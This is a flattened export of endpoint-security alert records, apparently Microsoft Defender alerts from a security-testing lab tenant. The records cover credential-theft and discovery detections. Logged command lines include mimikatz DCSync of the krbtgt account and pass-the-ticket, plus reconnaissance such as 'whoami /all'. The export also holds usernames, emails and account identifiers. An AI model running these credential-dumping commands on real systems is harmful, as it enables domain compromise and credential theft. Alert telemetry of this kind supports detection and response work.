[System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1c0f9c9177787b3146332dd0f112444d3062214f6e71e1a4bc16b1fb55818a86')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\EDR.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\EDR.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f84b9499bd9dc40b993886d328828a2ed82541e54b76f9cb9e04c007eb97d8be')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '2490d8e22c01e09f99c8e32a044d6c150e75e8e75028809f73fffd9d3bf4ed92')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\GroupPolicyObject.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\GroupPolicyObject.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '5b251a22c68070bcb6be4c85e71232067581fa1483ce767e2e9fbe98a4db0229')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '13ff49e1e4a5017ae784cbe39648f9f18af975c2ce9616d52d7d7b32bec05e50')) { exit 323;}; . 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1' }\"", "processCreationTime": "2022-11-16T09:04:33.0593386Z", "processId": 8912, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f43d9bb316e30ae1a3494ac5b0624f6bea1bf054", "sha256": "9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "SenseCM.exe", "filePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:24.8166991Z", "parentProcessFileName": "MsSense.exe", "parentProcessFilePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection", "parentProcessId": 2240, "processCommandLine": "\"SenseCm.exe\" \"eyJCYXNlQ25jQ2hhbGxlbmdlVXJsIjoiaHR0cHM6Ly93aW5hdHAtZ3ctZXVzMy5taWNyb3NvZnQuY29tLyIsIkNsaWVudFZlcnNpb24iOiIxMC44MjEwLjE5MDQxLjIxOTMiLCJDb21tYW5kUGFyYW1ldGVycyI6IntcImNvcnJlbGF0aW9uSWRcIjpcInsyM0UxMUQ3Ri02NzBDLTQ2QjItOERCRS1GODhGNjFERjhDMTh9XCIsXCJzY3JpcHRzQ29uZmlnU2lnbmF0dXJlXCI6XCJLUkU3cTVJVHNKVWdjNzltT1M3czJNd2g5NERhbWNvaE1jNkNzMHJQNHlvRHIzMTFNWU9qc2IrcFJSL2I5aENVU2ZVSlp1enlkTFYvbjk1eUZDUUlRMW5kSFc0NnFEU2gwUnA4UEhtSkxlbWpna21VMndlVVBQT1BUM0drZE5KV0pxc0NrZXpLSTlpb0tjS0V4NCtVR2xlRHdOODg4VGtiU3NnMUVuVHdMTFJhM3QwdGQwRDd0Ynk4VmhZeEg3a0ptT3dCcHhxUWVVWUVCRHdtdlJEbGhPREJ5MTdtMVZKc3ZjVWtWK0xGNkFaY3lySkV5WEEveStNVERYUEtIa0FROGYvUGM0ZWhnemJBMDUrTk9qZHVaeXFsdjBmUXk2ZlZpOGlCbW1USXdYME5RU2RjSzdKaGRUL1dJdXNtUkJCZWttWjRPTG5neHhmdXdJNWhCN2VjbkE9PVwifSIsIkNvbW1hbmRUeXBlIjoiQ2hlY2tJbiIsIk1hY2hpbmVJZCI6IjM2MTUwYjNjMWI2OWI1YzJkYTlkZjRlZmQ4NmFjNmMxNjY5MjRhNDgiLCJPcmdJZCI6IjMyY2YyMDJiLTEwMmUtNGQ1NC1iMjNkLWNmNTliNDJjZTBmZCIsIlByb3h5SW5mb3JtYXRpb24iOnsiQ25jUHJveHkiOiIiLCJNZW1Qcm94eSI6IiJ9fQ==\"", "processCreationTime": "2022-11-16T09:04:31.5834723Z", "processId": 7224, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "df74fb5ac185f503b3d8ad41dd692837b8cbae5f", "sha256": "32a2d7c9b290a8fa29ec6cb25448518920ec81e52ae45a7b9c1581451f08796f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "EDR.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "afb4863545535e35128e4be4208513cf39f6774e", "sha256": "f84b9499bd9dc40b993886d328828a2ed82541e54b76f9cb9e04c007eb97d8be", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "Firewall.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "5c964b2f15f51226beee127479a3faa43ef3ca3b", "sha256": "2490d8e22c01e09f99c8e32a044d6c150e75e8e75028809f73fffd9d3bf4ed92", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "GroupPolicyObject.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "5da25b7b5fe6003cfd98ab7bd7f37c010fcad756", "sha256": "5b251a22c68070bcb6be4c85e71232067581fa1483ce767e2e9fbe98a4db0229", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "PolicyEnforcer.ps1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6619021d8817281b5154d061e4f22786fc755ad1", "sha256": "13ff49e1e4a5017ae784cbe39648f9f18af975c2ce9616d52d7d7b32bec05e50", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Registry", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": "HKEY_LOCAL_MACHINE", "registryKey": "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "registryValue": "", "registryValueType": "Unknown", "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:44:38.56Z
Suspicious
None
Takeshi
prod.env
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:45.04Z
Suspicious
None
svc_acct
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037516158347999_762408514
311dfa90-c3dd-4c9e-89f9-70cb338c7786
686
MicrosoftDefenderForEndpoint
2022-11-11T08:20:15.8348224Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:35.9737654Z
2022-11-11T08:17:35.9737654Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:20:15.89Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.89Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit", "processCreationTime": "2022-11-11T08:17:35.8323763Z", "processId": 5620, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-12T13:46:04.6533333Z
Suspicious
None
darol
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:12:07.6266667Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043434789833977_-2118590079
b010066a-9c27-4f7a-a7f7-022d3f9fa13b
741
MicrosoftDefenderForEndpoint
2022-11-18T04:44:38.9834188Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T04:37:59.7709697Z
2022-11-18T04:38:58.3759755Z
Suspicious System Network Configuration Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1016", "T1049", "T1059.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "rnd.local", "firstSeen": "2022-10-10T06:18:04.255Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Takeshi", "domainName": "TMTOWER-BOOK" } ], "mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "onboardingStatus": "Onboarded", "osBuild": 22621, "osPlatform": "Windows11", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "None", "tags": [], "version": "22H2", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": null, "deviceId": null, "domainName": "TMTOWER-BOOK", "entityType": "User", "evidenceCreationTime": "2022-11-18T04:44:39.0033333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:44:39.0033333Z", "fileName": "Code.exe", "filePath": "\\Device\\HarddiskVolume3\\Users\\Takeshi\\AppData\\Local\\Programs\\Microsoft VS Code", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-11-14T04:36:09.1457881Z", "processId": 12136, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:44:39.0033333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:09.1457881Z", "parentProcessFileName": "Code.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume3\\Users\\Takeshi\\AppData\\Local\\Programs\\Microsoft VS Code", "parentProcessId": 12136, "processCommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Import-Module 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules\\PowerShellEditorServices\\PowerShellEditorServices.psd1'; Start-EditorServices -HostName 'Visual Studio Code Host' -HostProfileId 'Microsoft.VSCode' -HostVersion '2022.8.5' -AdditionalModules @('PowerShellEditorServices.VSCode') -BundledModulesPath 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules' -EnableConsoleRepl -StartupBanner \\\"PowerShell Extension v2022.8.5\nCopyright (c) Microsoft Corporation.\n\nhttps://aka.ms/vscode-powershell\nType 'help' to get help.\n\\\" -LogLevel 'Normal' -LogPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\logs\\1668400572-3c88b720-7963-4dd6-aba1-3456f669fe051668400566006\\EditorServices.log' -SessionDetailsPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\sessions\\PSES-VSCode-11004-905307.json' -FeatureFlags @() \"", "processCreationTime": "2022-11-14T04:36:16.5242809Z", "processId": 14616, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "9678ea8069d9812cda2a41c9d3dc32d5c4555b7b", "sha256": "529ee9d30eef7e331b24e66d68205ab4554b6eb3487193d53ed3a840ca7dde5d", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:44:41.2066667Z", "fileName": "nslookup.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T04:38:44.5311467Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 11488, "processCommandLine": "nslookup tmtower-book-dc.WORKGROUP", "processCreationTime": "2022-11-18T04:38:44.5456989Z", "processId": 7932, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "3bd6d9a9c94e16a3b7278990531b5d7d33d111d7", "sha256": "ed7c553ef847d0e6b42969d56d84ecda77d4770131f70661fd430c34d2bccb94", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:44:41.2066667Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 14616, "processCommandLine": "\"cmd.exe\" /c \"nslookup tmtower-book-dc.WORKGROUP\"", "processCreationTime": "2022-11-18T04:38:44.5311467Z", "processId": 11488, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "85afc4d1e65359e0a682878d55f4afcc51b070c2", "sha256": "b7edc54e6b42ca1cda290ce8cacfecaac6dbcc8c14631bc20fb184a6309c1824", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001152862062382_1044475447
f46a9913-3194-4f03-be39-205b334cf5e0
486
MicrosoftDefenderForEndpoint
2022-09-30T06:14:46.2062682Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:06.695814Z
2022-09-30T06:13:06.695814Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Critical", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:14:46.24Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-09-30T06:14:46.24Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "msdxv2-dc.msdxv2.m365dpoc.com", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-09-30T06:14:46.24Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.10", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:46.24Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:13.210308Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4064, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-09-30T06:13:06.6052353Z", "processId": 6464, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:59:39.6033333Z
Suspicious
None
steve
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
7,052
whoami /all
2022-12-22T08:48:41.0981025Z
3,032
2022-12-22T08:48:18.0279285Z
cmd.exe
C:\Windows\System32
Detected
3ad3fb0567038c2ec2e59e76690c2e6c01253af9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:15:19.35Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:59:44.34Z
Suspicious
None
steve
rnd.local
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930660064910_-1043423044
c82ef2f7-1b27-40a6-a43b-ce7a975623c2
765
MicrosoftDefenderForEndpoint
2022-11-21T02:04:26.0065203Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T02:02:28.8560243Z
2022-11-21T02:33:53.306249Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
